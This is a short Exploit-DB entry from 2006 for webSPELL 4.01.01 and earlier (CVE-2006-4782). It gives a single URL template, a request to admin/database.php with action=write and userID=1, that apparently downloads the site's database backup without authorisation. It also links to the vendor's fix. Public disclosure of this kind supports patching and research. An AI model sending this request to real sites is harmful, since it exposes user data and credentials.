webSPELL <= 4.01.01 Database Backup Download Vulnerability

2006-09-12T00:00:00
ID EDB-ID:2352
Type exploitdb
Reporter Trex
Modified 2006-09-12T00:00:00

Description

webSPELL <= 4.01.01 Database Backup Download Vulnerability. CVE-2006-4782. Webapps exploit for php platform

                                        
                                            # WebSPELL &lt;= 4.01.01 Accessible Database Backup Download Exploit
# Discovered by: Trex
# Visit: www.SecuritySector.org / www.UnderGround.ag

# Exploit:
http://[SITE]/[PATH]/admin/database.php?action=write&userID=1

# Solution:
http://cms.webspell.org/index.php?site=files&file=15

# milw0rm.com [2006-09-12]